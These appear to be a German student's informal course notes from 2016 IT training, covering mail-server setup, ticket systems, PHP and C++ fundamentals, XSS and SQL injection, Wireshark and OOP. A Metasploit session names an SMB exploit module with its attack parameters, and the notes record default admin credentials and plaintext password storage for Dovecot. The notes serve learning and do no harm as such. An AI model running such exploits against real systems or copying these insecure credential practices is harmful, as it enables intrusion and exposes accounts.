$USER nimmt eingenn nutzernamen wichtig für admin: alias anlegen: [email protected] z.B. postmaster: max info: ingo http://192.168.22.1/squirrelmail/src/login.php login: nur mein utzername auf antares password: password

Achtung! Init 1 zerfetzt System, setzt es in den Rescue-Mode!

Sendmail ← wer das hat, hat “weihung” für einen Linux-Admin. Postfix = sicherer, einfacher..

SMTA = Simple Mail Transfer Agent SMTA exime Debian lauscht auf Port 25 mutt → komfortabler tail -f /var/log/mail.*

Wer einen Account auf Antares unter der Domain einefrage.de hat, schickt einem Benutzer eine Mail. Mail [email protected]

Wenn man den eigenen Mailserver ins Internet setzt, muss man aufpassen, dass die mails, die man an jemanden schickt, nicht im Spamfilter der etablierten Maildienste landen! Der DNS Reverse-router könnte Abhilfe schaffen.

Mail ingo -s “hallo” .. diese Textdatei wird mit Magic-Zeichen in Mail gemacht – was, wirklich?? wenn gelesen, im Ordner mbox tail -f /var/log/mail/error.log less /etc/postfix/main.cf tail -f /war/log/apache2/ *.log ls -al /etc/systemd/system/dovecot.socket nano /etc/dovecot/dovecot.conf nano /etc/rc.local

/etc/postfix/main-cf mydestination = [email protected] cat /etc/aliases ← Shopbetreiber unter /etc/dovecot/users kann man das passwort für squirrelmail ändern squirrelmail abrufen: 192.168.22.1/squirrelmail echo "$USER:{PLAIN}password:$UID:$GID::$HOME" >> /etc/dovecot/users

Thema: mail mitmachen

echo "$USER:{PLAIN}password:$UID:$GID::$HOME" >> /etc/dovecot/users doveot min config

http://wiki.dovecot.org/BasicConfiguration Thema: url autostart

https://linuxconfig.org

Thema: linux src https://github.com/torvalds/linux [email protected]

/how-to-automatically-execute-shell-script-at-startup-boot-on-systemd-linux###

3.11.2016 Ticket Systeme mit Ingo Droß

Von Jonas: “Ticket systeme raus suchen, besprechen, installieren PHP,Ruby oder (Perl or Python) apache antares? Antares mail? SPOP/SIMAP [email protected] redmine-mysql konfigurieren Sie Redmine durch folgende Eingabe neu:

│ dpkg-reconfigure -plow redmine

TicketSoftware apt Perl PHP PYTHON/Ruby Trac google X X P Redmine X X R Bugzilla X Requst Track X X Open Ticket X X Request Mantis X

Priority normal Severity minor Reproducibilit have not tried y Status

Download entpcken → /var/www/ Vhost anlegen in apache mantis mysql FB + user (kein proxy//etv/hosts install Pageansifrn http://mantis mantis mantis user/passeord → PassManager user administrator pass: admin or face user jonas pass: 0101gh

7.11.2016 Mantis Ticket System mit Ingo Droß download entpacken → /var/www/mantis Vhost für Mantis anlegen Mantis entpacken erst als administrator, dann als admin anmelden.

Mantis .. wurde auf den Antares installiert, wir sollten unter gedit /etc/hosts 192.168.22.1 mantis eingeben, die ip 192.168.22.1 in der Adresszeile des Browsers eingeben und uns dann mit Mantis vertraut machen.

Ich aber hatte Mantis auf meinem eigenen Server installiert, obwohl wir es nicht brauchten .. ich wollte halt ein Ticket System auf meiner Kiste haben!

Bugzilla Ticket System 2

/var/www/ link bugzilla → buzilla-5.0.3” hat Ingo nicht geschafft zu installieren. Dafür hätte es zusätzlich Perl gebraucht.

Perl: Wikipedia zitat: “Die Bearbeitung von Texten mit Hilfe regulärer Ausdrücke sowie viele frei verfügbare Module, die an einem zentralen Ort (CPAN) gesammelt werden, sind Stärken der Sprache.” Larry Wall “erfand” perl: “Eine Hauptaufgabe war dabei, übersichtliche Berichte aus verstreuten Logdateien zu erzeugen. Da ihm die vorhandenen Sprachen und Werkzeuge dafür zu umständlich erschienen, entwickelte er mit Hilfe seines damaligen Teamkollegen Daniel Faigin und seines Schwagers Mark Biggar schrittweise eine eigene Sprache, um seine Aufgaben zu lösen.”

Am nächsten Tag installierte Ingo dafür Redmine.. Das wurde nick und mir zuviel und wir installierten es nicht auf meinem Server.

Ein paar Tage später nahm Ingo mit uns Metasploit durch und Payload und Botnetz .. alles sehr interessant!!

“..da der Amiga 500 keinen Netzschalter hat.”

“Ein Exploit eines Hackers (bzw. eines Crackers) ist mit der Brechstange eines Einbrechers vergleichbar: beide verschaffen sich damit Zugang zu Dingen, für die sie keine Berechtigung besitzen.”

Payload hat auch was mit Stack Overflow zu tun:

Stack overflow: Zitat: “Pufferüberläufe (englisch ‚buffer overflow‘) oder – im Besonderen – auch Stapelüberläufe (englisch ‚stack overflows‘) genannt, gehören zu den häufigsten Sicherheitslücken in aktueller Software, die sich u. a. über das Internet ausnutzen lassen können. Im Wesentlichen werden bei einem Pufferüberlauf durch Fehler im Programm zu große Datenmengen in einen dafür zu kleinen reservierten Speicherbereich – den Puffer oder Stapel – geschrieben, wodurch nach dem Ziel-Speicherbereich liegende Speicherstellen überschrieben werden.”.

Meterpreter

Social Engineer Toolkit..

Payload, keylogger .. . backdoor, drive by. sort_String sortiert alles, was über einem asoziativem Array (auch mit *.txt – Verknüpfung) rein kommt!

8.11. Virus, worm, exploit, trojaner, payload → drive by

Sendmail hatte Lücke, dass man Sachen auf dem System machen konnte.. c-programm im Anhang (früher waren im Mailprogramm Compiler dran) .. worm.

Amiga 500 88-89 Ingo hatte den ersten Tag mit dem neuen Rechner, war Computer infiziert.

Botnetz: .data ; .exe

Dann wurde uns ellenlang ein Exploit erklärt .. sehr interessant !! smbpipe, ex | rhost, rport, payload, lhost, lport mst > use exploit/windows/smb/ms08_067_net.api

Payload: böseböse stack overflow..

9.11. PHP mit Antje Osten

Klassenbucheintrag:

Grundlagen der Programmierung: Einordnung Programmiersprachen nach Paradigmen; Unterschied Prozedurale/OOP; Datentypen im Vergleich, Sinn von Datentypen, Typprüfung; Fehlereinordnung:syntax, semantisch,Laufzeit; reservierte Wörter; Operatoren: Mathematisch, zusammengesetzt, prä-post-fix, Vergleich, Logisch, Bit; Definition false and true in PHP; Schleifen: for.

Klassischer Programmierunterricht.

Übersicht: php, java,c++, Datentypen, Verzweigungen, Schleifen: Wo ist der Unterschied? Referenzen, Hacken (Prinzip verstehen), Honeypot bauen, Mail Injection, Ganz modernens Hack-Szenario (Man wird vom Firefox-plugin getrackt), Forensik Struktugramme müssen wir zur Prüfung auswendig können.

Das Generationenmodell ist prüfungsrelevant..

1. Schicht: bitfolgen mascheinensprache 2. Schicht: assembler 3. Schicht: opjektorientierte Programmiersprachen 4. Schicht: Befehlssprachen z.B. SQL 5. Schicht: Skriptsprachen 5. Schicht: KI .. doch das OSI-Modell?? Programmierparadigmen: Prozedurale (hat libraries an Bord): PHP, GO, Rust, c (c sollte man für Herzschrittmacher nehmen).. Objektorientiertes: c++ .. aus rohem Speicher lebendige Masse machen, die geboren wird, lebt und stirbt php kann auch objektorientiert sein. Java: Vererbung, interfaces, abstrakte Klassen Funktionale: Eine Funktion einer anderen Funktion geben. Strukturiert: Von oben nach unten.. Aber, Java hat doch auch Libraries am Bord..?? Die Zukunft gehört den funktionalem Programmiersprachenparadigma

Java: person antje = new person(); antje.farbe(); Was wohl ein Beispiel für die Objektorientierung sein soll, oder?

Objekt: 1. Lebenszeit, 2. Zustand, 3. Identität, 4. Kommunikation Wann stirbt ein Objekt in Java? Wenn keine Referenz, Garbage Collector, kein Zeiger mehr drauf ist.

Parser: Durchläuft, ob alles richtig ist. Wenn's im speicher liegt, wird Zustand geändert z. B. Haare gefärbt. Identität bleibt erhalten .. in welchem Zusammenhang? Mit dem Objekt, oder dem Parser??

Compiler: Von sehr leistungssfähigen Menschen gebaut.

Bestimmt kommt so eine Prüfungs-Frage: Was ist eine Entwicklungsumgebung? Entwicklungsumgebung: Hat Compiler, Debugger, Texteditor, Werkstatt

Kommunikaion ist senden und empfangen. Karl Marx sagte, dass der Mensch erst durch Kommunikation zum Menschen wird.

0-127 ist ASCII-Code. ASCII sind die Dezimalzahlen, wenn wir von hexa in dez umwandeln und hexa ist wiederum der blanke Binärcode, der im Web übertragen wird.. . 256?? -128 bis + 127 ?? 128 = länderspezifisch

Stellt euch vor, schnelle Algorithmen entwickeln zu müssen..

Berechnungen würden nicht funktionieren, deshalb ist bool 8 bit gesetzt .. wieso eigentlich?

Float-Maschine, Modulo Warum floatmaschine? Datentypen

Daten sind nicht gleich Daten. Nehmen Sie z. B. die Daten 1000 und "Gülten". Sicherlich werden Sie erkennen, dass Sie es hier mit unterschiedlichen Typen von Daten zu tun haben und wir lernten, dass die Datentypen unter Java, c++ und PHP auch nicht immer gleich sind. z.B. gibt es elseif NUR unter php, oder der BOOL-wert ist bei java 2 byte groß und bei den anderen nur 1 byte, vermutlich.

Java interpretiert char: 2 byte wollen von vornherein unicode-fähig sein, Garbage-Collector, Goldener Käfig, sicherer zu programmieren.. int bla 4 Auch enger, logischer und eindeutige Grammatik?

C++ kompiliert gcc (auch auf Windows, mit codeblocks), bcc (borland-Welt), d (Windos-Welt). Datentypen: BOOL (1 byte), CHAR(1 byte -128 bis +127bit), unsigned CHAR(0-255bit), INT(2 byte), unsigned INT(2 byte 0- 65.535), es gibt auch INT 32 (4 byte), und sogar INT 64 (8 byte), unsigned INT ist. Float(4 byte), double(8 byte), long double (10 byte). String existiert nicht: 'A' 'B' 'C' muss man in Arrays rein packen. Weil viele nicht an das Ende-Zeichen denken, kann leichter exploitet werden. Auch enger, logischer und eindeutige Grammatik?

PHP intpr./comp. Bestimmes vorkompiliert schnelligkeitshalber. Soll für viele Menschen Sprache sein z.B. Webdesigner. String als nicht brechend. Datentypen(skalar): BOOL (1 byte), INT(8 byte), FLOAT, DOUBLE(8 byte), STRING. Datentypen(zusammengesetzt): Array,Object. Datentypen(speziell): resource, NULL. resource_id = Zeiger in php. $bla = 4

INT ist immer das, was größer wird .. wird im speicherort INT auf der Festplatte etwa die Zahl hoch und runtergeschraubt? Dann ist eine europäische Rakete abgestürzt, weil der Datentyp INT der Bodenstation nur 2 byte hatte, anstelle von 4. Bereichsüberlauf. Bodenstation hatte ein altes DOS.

Dann ging es darum, dass der Speicher einerseits vom Betriebssystem belegt ist und so und so viel für den Browser, ein Spiel oder Word belegt ist. Es ging um Code, Heep und Global. Und das Programm selber zum Teil im Stack.

BS rechnet Offset drauf. Freier Speicher hat nur Adressen. Wenn Spiel beendet, wird Speicher im OS frei gegeben. Markiert, nicht überschrieben. Irgendwann friert Server ein. Allozieren freigeben in c++.

Adobe *.dll wird über Crack überschrieben.

Einerkompliment

0011 = 3 0010 = 2 0001 = 1 0000 = 0 Zweierkompliment Eins von 1 zu -1 komplimentieren: Macht Compiler. 1111 = -1 Negativ ist um +1 versetzt, weils keine 1110 = -2 negative Null gibt. 1101 = -3

Mantisse und Exponent wissen.

Als Mantisse bezeichnet man die Ziffernstellen einer Gleitkommazahl vor dem Exponenten oder Exponentialausdruck. Beispiel: Bei der Zahl 2,9979 · 108 ist 2,9979 die Mantisse. In der Informatik sind die Mantissen für die Darstellung von Gleitkommazahlen von herausragender Bedeutung, welche vorzugsweise durch [Vorzeichen(s)] · [Mantisse(m)] · Basis(b) [Exponent(e)] dargestellt werden. Zitat: “Die Exponentialschreibweise Jede reelle Zahl kann man in der Exponentialschreibweise darstellen. Ein Absatz weiter oben haben wir das schon mit der Zahl -5,4 Milliarden gemacht. Allgemein kann man sagen: Eine Zahl kann man darstellen als Mantisse * Basis hoch Exponent. Das bedeutet: -5400000000 = -5,4*109 Die Mantisse Die Mantisse ist die Kommazahl, die mit der Basis hoch dem Exponenten multipliziert wird. Diese Kommazahl ist jedoch erstmal nicht auf eine bestimmte Form festgelegt. Alle untenstehenden Zahlen haben den selben Wert:

-5,4*109 = -54,0*108 = -0,54*1010

Eine gut gewählte Mantisse erspart einem beispielsweise bei sehr großen Zahlen viel Schreibarbeit.

76459000000000000000000 = 7,6459*1022 Die Mantisse ist also immer die Zahl vor dem Exponenten.” Aber wo ist hier ein Beispiel?

1 = 00000001 0 = 00000000 -1 = 11111111 -2 = 11111110 Ist das hier jetzt ein Datentyp in seine Bits zerlegt?

Zeiger auf der Struktur: Resource-id handler (hier ist der Zeiger) fopen = $fp connect = $fp fclose($fp);

Operatoren (guckt man sich nach Datentypen an). Sie sind für Größenbestimmungen im Speicher und ob Zahl, oder Buchstabe. mathematische-, vergleichs-, logische- inkrementelle und dekrementelle Operatoren:

Mathematische: +,-, *, /,% % Modulo .. 15%7 = 1 aber 30%1 = 0 23%5 = 3 ..der Rest, der beim teilen übrig bleibt, ist immer Modulo! Professionelles Programmieren: $alter+=2; und der = Zuweisungsoperator.

== Vergleichsoperator. Führt Vergleiche zwischen einer Variable und einem Wert aus, wird besonders bei if- Abfragen gebraucht, z.B um unter “date”, wo die Tage 0-6 lauten, Werte wie Wochentage: “Sonntag”, “Montag” etc. zuzuweisen. String int '3' == 3 true '3' === e false (prüft den Datentyp) .. nicht identisch?? '3 Katzen' == 3 eigentlich: 3==3 Damit es der Webdesigner einfach hat, was für den Programmierer scheußlich ist. Das Merkmal von PHP, dass es nicht typ- geprüft ist. Perl und ruby sind auch nichttyp geprüft. Es geht in java und c++ nicht. Eine Variable kann dort immer nur ein Typ sein int bla 4 echo “2” + “2” .. das + ist kein Konkatenator! Das identisch, das === gibt's in c nicht.

Logische Operatoren && and if{“antje”===$name && true? || or ! not

incrementelle (++$i, $i++) und dekrementelle (--i$, $i--) Operatoren Präfix: ++i$, --i$ Postfix: $i++, $i-- Gib aus, dann zähle = semantik.

$i = 4711; Ausgabe Speicher echo $i++ = 4711 4712 echo ++$i = 4713 4713 echo$i = 4713 echo$i-- = 4713 4712 echo--$i = 4711 4711 echo $i = 4711 4711

Schleifen: for($i=0; $i < 3; ++$i); ++$i = $i+1; $i $i++ $tmp = $i; $i + 1; $tmp

Wieder Wahrheitstabellen false = 0; true = 1

and or A B A&&B A||B AxorB 0 0 0 0 0 1 0 0 1 1 0 1 0 1 1 1 1 1 1 0

Binäroperationen: & | ^ << >> A 0001 1 Maskieren $i = 3; B 0011 Über Nutzerrechte ?? $i << 2 A&B= 0001 da werden einfach zwei Nullen rein geschoben, so dass aus der 3 es binär die 12 ergibt. Die vorderen zwei Nullen fallen einfach raus! Oder??

Fehlerarten:

Semantische, Subst. (semantic error) Ein Fehler in der Bedeutung. In einem Programm eine Anweisung, die syntaktisch zwar korrekt (zulässig) ist, funktionell jedoch fehlerhaft. Ich vemute mal eine for-schleife, die keinen sinn ergibt, oder so ähnlich.. syntaktische Syntaxfehler (eng. Syntax error) im Allgemeinen sind Verstöße gegen die Satzbauregeln einer Sprache. und Laufzeitfehler/logische Fehler (diese sind am schwersten zu finden, weil's der compiler nicht erkennt).

Schleifen for muss immer drei Fächer haben. while, foreach .. als Beispielsprache wählte antje immer php. Und wie schleifen funktionieren.. . dann gibt es noch so eine schleife, die würde ich gerne selber ausprobieren.. continue; → schützen vor unserem chef. man kann unter php.ini enstellen, wann eine endlosschleife zu Ende zu sein hat.

If(3==3) echo “drin”; → drin if(-4177) oder if (“bla”) → drin if(false) oder if(0); oder if(” ”) => nicht drin!

!4711 = false...

Isset $x 4711; if(isset($x)) echo “gesetzt”; Wirklich? Das funktioniert. Aber, wofür braucht man das?

10.11.2016: Paradigma (aspektorientiert), Schleifen for/while/do_while; Verzweigungen if/switch …

Klassenbucheintrag: Schleifen for/while/do_while; Verzweigungen if/switch; Funktionen: Einsatz, Unterscheidung Prozedur/Funktion; Rückgabewert; Funktonsdefinition; Stack/Heap, Unterschied Stack/Queue; Speicherbild eines Prozesses; Referencen in PHP, Value-Call, Reference-Call; Sichtbarkeiten von Variablen;

Was ist überhaupt ein Paradigma? Beispiel; Muster. "in seiner Tätigkeit einem bestimmten Paradigma folgen"

Selfhtml: „Ein Programmierparadigma ist eine Klassifizierung der Art bzw. Struktur der Programmierung. So gibt es Sprachen, in denen der Programmierer schreibt, WAS zu tun ist (deklarativ) und Sprachen, in denen das WIE beschrieben wird (imperativ).“

Imperatives Programmierparadigma WIE? .. die Urform der Programmierung .. ein Programm aus einer Folge von Anweisungen besteht, die vorgeben, in welcher Reihenfolge was vom Computer getan werden soll.. klassische Art der Programmierung .. alle Assemblersprachen. .. Die imperative Programmierung ist wiederum ein Überbegriff für strukturierte, objektorientierte, prozedurale Programmierung und einige weniger bedeutende mehr. Weil Java eine objektorientierte Sprache ist, ist sie daher imperativ (sagt man das so?).

Assemblersprachen kapseln hardwareabhängige Binärbefehle für Arbeitsspeicher und Registerzugriffe in kurzen, generalisierten Zeichenketten, und befreien den Softwareentwickler damit von der Notwendigkeit, sich mit dem detaillierten Aufbau der gesamten Rechnerhardware zu beschäftigen.

Objektorientierte Programmiersprachen erlauben die Kapselung konzeptionell zusammengehöriger Funktionen und Variablen in unabhängigen Modulen (Klassen) mit klar definierten Schnittstellen, wodurch die Wi ederverwendbarkeit der einzelnen Module erhöht wird und der Softwareentwickler davon befreit ist, sich mit der internen Implementierung der von ihm verwendeten Klassen auseinanderzusetzen.

Jetzt wirklich? Aspektorientierte Paradigmen? Sowas? ist ein Programmierparadigma für die objektorientierte Programmierung. Bei der aspektorientierten Programmierung wird der objektorientierte Begriff der Klasse zum Aspekt erweitert und ermöglicht so orthogonale Programmierung.

Deklaratives Programmierparadigma WAS? Der Begriff „deklarative Programmierung“ wird häufig als Überbegriff (unter anderem) für die logische, funktionale und prozedurale Programmierung vorgestellt. Weil js eine funktionale Sprache ist, ist sie daher deklarativ (sagt man das so?).

Prozedurale Sprachen erlauben die Kapselung einfacher Funktionen, wie das Sortieren einer Namensliste, innerhalb einer Prozedur. Damit entfällt die Notwendigkeit von Zeilennummern und daran gebundenen Sprungbefehlen sowie das mehrfache Entwickeln derselben Funktion an verschiedenen Stellen des Programmcodes. https://wiki.selfhtml.org/wiki/Programmiertechnik/Programmierparadigma Aber, was der Unterschied zwischen den Paradigmen ist??

PHP echo “3 Katzen”+ “Antje54” = 3 In einer Zeichenkette muss die Zahl immer am Anfang stehen. echo “bla\”hallo\”bla”; = Entschärfung echo 'bla”bla”';

PHP erlaubt auch Raute Keine PW's in die Html-Anweisung

$alter = 54; echo “Antje st $alter”; ← ersetzt echo 'Antje ist $alter'; ← ersetzt nicht, ist aber schneller, weil er muss es nicht parsen. Parsen ist teuer, kostet viel ticks. foreach = erst, wenn man arrays hat. for($i = 0; $i<2; echo ++$i); Den Präfix hier beim Operator zu setzen, macht die Schleife schneller. Es kommt 1 und 2 raus. Bei $++ 0 1 . .. was genau in der Schleife passiert. while (Bild) Nur wenn die Bedingung wahr ist, springt er über while-schleife. {

} .. do { } while(Bild); ← prüft er erst Bedingung = es gibt nur if-abfragen!

Unterschied zwischen Schleifen und Verzweigungen.

Switchcase $switch = Rutschbahn.

Php: if(x)327 .. ??

$x=”ABC”; switch ($x) { case “abc” break; case “def” break; } Wenn er nicht weiter rutschen soll, break einfügen.

Range = Bereich.

Hash = eindeutige Nummer für Zeichenkette. Im Studium muss man dann Hash-Algorithmen programmieren. framework: ich darf nur bestimmte Wege gehen, wie es der Programmierer will. Bibliothek → jquery = jscript-Bibl.;Sammlung von Funktionen .. kann selber?? $nr = $_GET['id']; switch($nr) Schnell erweiterbar {case 1: index.php case 2: bla.php } typgeprüft: für AE ganz wichtig.

PHP und JS sind nicht typgeprüft.

Include, require .. require ist teuer und hat keine Konstanten. Ist aber für Passwortgeschichten gut. Strukturierte Programmierung: schlechte Verzweigung.. usw, was wir hatten. Objektorientiert: komplexer.

Niemals Zeichenketten als Parameter in der Adresszeile des Browsers übergeben

Schwer: funktionen als Unterprogramme. prozedur(schneller)

kann ich dann so oft rufen, wie ich will.

Dass man über Zeiger und Referenzen in andere Speicherbereiche rein gehen kann.. das gibt es?? function addiere()..

Packen: -- In ein 7zip packen: 7z x -so yourfile.tar.7z | tar xf - -C target_dir tar -cvzf X.tar.gz verzeichnisname/ Packt das Verzeichnis Verzeichnisname in das X.tar.gz – tar !! Man kann noch mehr parameter einfügen, um es z.B. doll zu packen!

-- Entpacken: tar -xzvf datei.tar.gz entpacken: 7z e basic.7z

– Wenn dein Webserver streikt, dann hilft DAS LOG weiter! Das ARP weniger, womöglich die Gothic-Band das ASP auch nicht, aber DAS LOG! tail -f /var/log/apache2/*.log .. der logvogel!

Liebe liebe Antje, diese Schleife funzt nicht: for($i = 0; $j = 0; $i<3; ++$i; $j<2) { echo $i,$j;

}

Warum??

Gemeiner Exploit: Zeichenkette.

Foreach: erst, wenn man arrays hat iterieren = durchlaufen.

Speicher stack LIFO = Last In First Out “Elemente werden übereinander gestapelt und in umgekehrter Reihenfolge vom Stapel genommen.” Nachdem drei Daten rein gekommen sind, ist der Zeiger ganz unten, am datenpaket, dass zuerst rein gekommen ist und schiebt alles nach oben, so dass das oberste raus fällt. Das erste, was zuerst auf den Turm gelegt worden ist, wird auch wieder runter genommen. Umgekehrt? Etwa von unten??

FIFO = First In First Out Nachdem drei Daten rein gekommen sind, ist der Zeiger ganz unten und drückt das Paket aus den Speicher, auf den er gerade drauf zeigt, das erste Datenpaket. (Wie soll das gehen, wenn man nur das weg nehmen darf, was drüber liegt??) Die zwei anderen Pakete, die später rein gekommen sind, bleiben aber unverändert im Speicher.

Mit dem nächsten Pull wird der LIFO wieder eins nach oben geschoben und der FIFO entledigt sich des zweitletzten Paketes.

Mit dem nächsten Pull wird der LIFO sein ältestes, das erste Paket los und der FIFO des jüngsten.

Stacken, pushen & poppen bezeichnet jegliche Verfahren der Speicherung, bei denen diejenigen Elemente, die zuerst gespeichert wurden, auch zuerst wieder aus dem Speicher entnommen werden. Aber wozu braucht man einen Stack? Mithilfe von Stacks lassen sich Terme und Syntaxen auf die richtige Verschachtelung überprüfen.

Alias xml = Sprache, um Daten zu transportieren.

Hex-Editor: Binärdateien öffnen und lesen. Struktogramme „Was sind Formulare“ Arrays: bis zur 3. Dimension [email protected]

14.11.2016 Datenbankconnections mehrsprachig machen

Klassenbucheintrag: Wiederholung; Assoziative und numerische Arrays; Funktionen weiterführend; globale und statische Variablen

Unter Windows mysql auf Konsole erreichen: c:\xampp\mysql\bin>mysql.exe -h localhost -u root -p sollte man schnell einpflegen subtag-kürzel: arabisch = ar deutsch = de

Fallback: Deutsch .. die dann mehr sprachig werden kann.

- Datenbank soll Deutsch, Englisch, Dari und Paschto können? = UTF-8

- Strom zwischen db-server und http-serv muss utf-8 sein mysql_query(): attrappe: mockup was nicht übersetzt werden muss: die Schaltung. in der echten Welt: immer einen echten Übersetzer haben.

Antje will bilderupload-anfang machen.

Numerisches Array Integerzahlen. Immer bei null anfangen.

Assoziatives Array gehen als index mit der zeichenkette

$arr[“chef”]=”Gavlet”; $arr[“sekretär”]=”Gamier”; Wie viele elemente hat dieses Array? 15.11.2016 ???

Zum nachschauen: Bücher internet .. nicht copy & paste .. sicherheitslücke. Gedanken, wie man das Biest sicher macht.

Dateien mit der shell finden: find / -name "index.html"

16.11.2016 Weiterhin fileuploads (Bilder, Audiodateien) mit Antje

Wenn ich ein Textfeld habe, wirds mit test geschickt, außer mit enctype, dann wird's binär geschickt.

Was ist mit sqlinjection .. keine soll möglich sein. Crosssidescript. Nicht in der datenbank schon prüfen.

Zitat: “Cross-Site-Scripting (XSS; deutsch Webseitenübergreifendes Skripting) bezeichnet das Ausnutzen einer Computersicherheitslücke in Webanwendungen, indem Informationen aus einem Kontext, in dem sie nicht vertrauenswürdig sind, in einen anderen Kontext eingefügt werden, in dem sie als vertrauenswürdig eingestuft werden. Aus diesem vertrauenswürdigen Kontext kann dann ein Angriff gestartet werden. Ziel ist es meist, an sensible Daten des Benutzers zu gelangen, um beispielsweise seine Benutzerkonten zu übernehmen (Identitätsdiebstahl).”

Kein js-alert in der datenbank. Beim rausholen das crossidescript. Anstelle antje.jpg kann sich ein js einklinken und dich glaubhaft machen, dass man ausloggen.

Dateinamen bereinigen, dass er html-konform ist .. aufgrund der Leerzeichen und Umlaute... ..mit einem kleinen Array.

Crossidescript: Böses js kann mit jpg in datenbank gelesen...

Javascript läuft jetzt auf dem Server! Json.. . praktikum: die über charite .. da waren sehr viele Richtungen. Bundesdruckerei (aber fast schon zu spät).

Das insert bauen. Dann sql-injection. http://overapi.com/php ... Ab Donnerstag (17.11.) will Antje c++ machen.

1. runde: php

2. runde: c++ Gemeine Schnittstelle ist in c++ nicht vorhanden, aber in java. .. white list, blacklist, sql-injection crossidescript ist prüfungsrelevant, muss man definieren können .. der rechtsanwalt von heise guckt jeden morgen in die foren für political correctness. .. ordner zippen .. komprimierung . .beim upload zippen lernen .. hackintosh-stammtisch .. Compiler down loaden codeblocks.org http ist im Gegensatz zu ftp stufenlos cookie .. session prozedurales Paradigma

17.22.2016 Vom Text im Binärcode zum ausführbaren Programm

Editieren, Präprozessor, Compiler, Linker

Prozedural ist wie ein Baum, dessen Wurzeln ganz tief rein gehen .. linux: configure = ob alle Bibliotheken da sind, die man braucht. Make = wird vom Programm dann ausgeführt.

„Klasse, Objekt und 'wir sind alle Instanzen'“ ein c++ - Beispiel.. einsprungsfunktion wo im er-Modell(annahme) innerhalb einer Klasse/Kategorie die Attribute und Methoden gesetzt sind Was ist bulk rename?

18.11.2016: Netzwerke, Wireshark, OSI:

(ins Berichtheft .. dass ich hier war).

Zitat: “Wireshark is the world's most popular network protocol analyzer. It is used for troubleshooting, analysis, development and education. ”

Switchen und route sind 2 verschiedene Schuhe..

Netzzugangsschichten tcp/ip sind eigentlich zwei schichten. Arp: Fest Schicht 2.

Ab Schicht 5: anwendung .. popelt man nicht auseinander.. tcp ist kein protokoll, sindern eine protokollfamilie, die aus mehreren Protokollen besteht.

Bitstream von wirestark liest sich ganz unten in netzwerkkarte ein .. liest die bits mit und weiß, wo es aufhört.

Dann fängt er an, das ganze ding zu analysieren.

Er trennt die Bits in Schichten. Normalerweise sind es 1500 bytes.

Er sagt, wo es ethernet zuende ist, wo fängt IP an, schaut sich die frequenzen an usw.. .

Versuchen, über wireshark dieses jpeg herstellen kann.

1. ethernet 2.ip 3. Das tCP ist nur ein Teil

Wireshark: TCP/IP ack & syn – Wiederholung.. TCP hat einen Puffer

Nochmal Hrn. Rüdiger bitten, anhand von Wireshark Routung, Switching und das detaillierte Zusammenspiel der Protokolle im OSI zu erläutern .. oder selber mal versuchen, einzurichten ..

In der cimdata ist es nicht so einfach, weil der Proxy dazwischen hängt.

TTL = 60 hops, wieviele router kann er überleben.. . TCP = Port 3128 (unser proxy). Und destimation port.

Sequenznummer..

Checksumme

.. wir hatten pure prozedurale Programmierung echt? Wann denn?

Was ist prozedural? auf prozeduren basierend.. Aber wie wo sind diese Prozeduren genau? ordner, dort liegt die index auf der obersten ebene imageordner, style, library ordner lib hat ausgelagerte funktionen .. dort lege ich lauter funktionen hinein. Die schlafen, ich kann sie aber wecken, wenn ich sie brauche.

Zeitangaben.. .. Benjamin macht jacascript, da ist das funktionale auch dabei .. .

21.11.2016 Objektorientierte Programmierung mit Antje Osten:

Klassenbucheintrag: objektorientere Programmierung: Einführung; 3 Säulen der OOP; Kapselung und Verbergen, Vererbung, Polymorphie; UML für Klassen und Objekte; Sichtbarkeiten; Speicherbild; Konstruktor-Destruktor; Lebenszeit, Zustand, Ort, Kommunikation; Testen von Klassen; Datei als Klasse; Honypott die erste;

(eine Grafik einfügen) Es gab da so eine super Grafik, wo es direkt nebeneinanderlag, um unterschiede zu sehen..

Kapseln und verbergen * Vererbung und * Polymorphie von Daten * Wiederverwendung * (Vielgestaltigkeit) *************************************************************************** ist das Gleiche wie ein Trans- * mother-(basis-)class * formator (mit solchen Spulen) * **************** * setFarbe() * * server * * { ***************** * **************** * 4farben *Auto -(primary) * * * - port * * rot, schwarz, weiß, blau ***************** * **************** * } *-Geschwindigkeit * #(pro- * ^ ^ ^ * *-Farbe, -Km-Stand* tected) *mail FTP HTTP * ***************** \ * * * + fahre(); * \_>* Vererbung(wichtig) * * + hupe(); * * * * - schaltübertragung(); * nach oben (zur Mutter- * * + get Farbe(); * + * klasse): abstrakt. * * + set Farbe(); * public * unten: Spezialisierung * **************** * oberste: Abstraktion * + = erlaubt - = nicht erlaubt Es ist wie bei Java: setzt man ein Minus, ein private, ist Zugriff nicht mehr erlaubt (will IHK sehen).

Vererbung erfüllt in Hochsprachen wie Java und C++ vor allem zwei Aufgaben: einerseits hilft sie, das Programm besser zu strukturieren, andererseits verringert sie den Umfang des Programmcodes und erleichtert die Programmpflege.

Wenn die IHK sagt: “schreibt alles, alle Getter und Setter, es ist wie der Schnittstellenstrom beim Transformator → = Zuweisungsoperator.

************************************************************* * Codebereich * Stack LIFO * Freispeicher (Heep) * *0110101001001011 * * * ****************** * * * Register * * nur 0X100 bekannt * ****************** * –------* *Globale ****************** / 0X17 norman \ * * * 0x17 * | | * * ****************** | 0x2 Monika | * * * 0x2 * | | * * ****************** | 0x13 Nadine | * * * 0x13 * \______/ * ************************************************************ Antje soll mir nochmal zeigen, wie das aussgehsehn hat

Der Konstruktor baut ein Objekt.. . (siehe Beispiel, dass Antje mit uns in PHP gemacht hatte)

Diese Datei.. log($_SERVER['REMOTE_ADDR']); include("inc/fuss.php"); ?> Überträgt IP, Uhrzeit und Datum: 127.0.0.1 21.11.2016 02:41:49 dazu gehört.. ...die datei_class.php

fileName = $f; $this->fileHandler = fopen($f, $m); echo "Konstruktor
"; } public function __destruct() { //datei schließen fclose($this->fileHandler); echo "Destruktor
"; } public function log ($ip) { fwrite($this->fileHandler, $ip); fwrite($this->fileHandler,"\t"); fwrite($this->fileHandler, date("d.m.Y h:i:s", time())); fwrite($this->fileHandler,"\r\n"); } } ?>

Der Mensch lernt durch kategorisieren... und sogar abstrahieren.

Kategorisieren = einordnen. Abstrahieren = eine Schlussfolgerung aus etwas ziehen.

Menschen denken objektorientiert.. andere denken wie Prozessoren. Aber die meisten objektorientiert, weil letztlich ist das ein Haus, das ein Bildschirm.

C++ war lange im Elfenbeinturm. C kam sofort in die Wirtschaft.

Was ist, wenn die Software größer wird, dann ist die prozedurale Programmierung nicht geeignet. Erst gab es C mit klassen, dann c +1 dann c ++

